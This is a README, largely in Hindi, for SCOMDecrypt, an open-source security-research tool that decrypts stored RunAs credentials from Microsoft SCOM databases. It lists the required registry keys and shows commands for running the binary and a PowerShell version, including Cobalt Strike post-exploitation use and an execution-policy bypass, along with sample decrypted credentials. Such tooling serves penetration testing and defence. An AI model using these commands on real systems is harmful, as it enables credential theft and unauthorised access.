
SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers
NCC Group Plc द्वारा ओपन सोर्स के रूप में जारी - http://www.nccgroup.trust/
रिचर्ड वॉरेन द्वारा विकसित, richard [dot] warren [at] nccgroup [dot] trust
http://www.github.com/nccgroup/SCOMDecrypt
AGPL के अंतर्गत जारी, अधिक जानकारी के लिए LICENSE देखें
यह टूल Microsoft System Center Operations Manager (SCOM) डेटाबेस में संग्रहीत RunAs क्रेडेंशियल को पुनर्प्राप्त और डिक्रिप्ट करने के लिए डिज़ाइन किया गया है।
पृष्ठभूमि के लिए, कृपया NCC Group ब्लॉग पोस्ट यहाँ देखें।
टूल चलाने के लिए आपको SCOM सर्वर पर प्रशासनिक विशेषाधिकारों की आवश्यकता होगी। आपको यह भी सुनिश्चित करना होगा कि आपके पास निम्न रजिस्ट्री कुंजी तक पढ़ने की पहुंच है:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins
आप निम्न कुंजियों से कनेक्शन विवरण एकत्र करके मैन्युअल रूप से जांच सकते हैं कि आप डेटाबेस देख सकते हैं:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName
यह टूल दो प्रारूपों में आता है।पहला एक C# बाइनरी है जिसे SCOM सर्वर पर बिना किसी तर्क के सीधे चलाया जा सकता है, जैसा निम्नलिखित है:
.\SCOMDecrypt.exe
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
टूल का PowerShell संस्करण भी उपलब्ध है। यह Cobalt Strike या Empire जैसे टूल्स के साथ उपयोग के लिए पोस्ट-एक्सप्लॉइटेशन परिदृश्य में उपयोगी है। Cobalt Strike के साथ टूल का उपयोग करने के लिए:
powershell-import C:\path\to\SCOMDecrypt.ps1
powershell Invoke-SCOMDecrypt
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
PowerShell कंसोल में चलाने के लिए:
powershell.exe -exec bypass
. .\Invoke-SCOMDecrypt.ps1
Invoke-SCOMDecrypt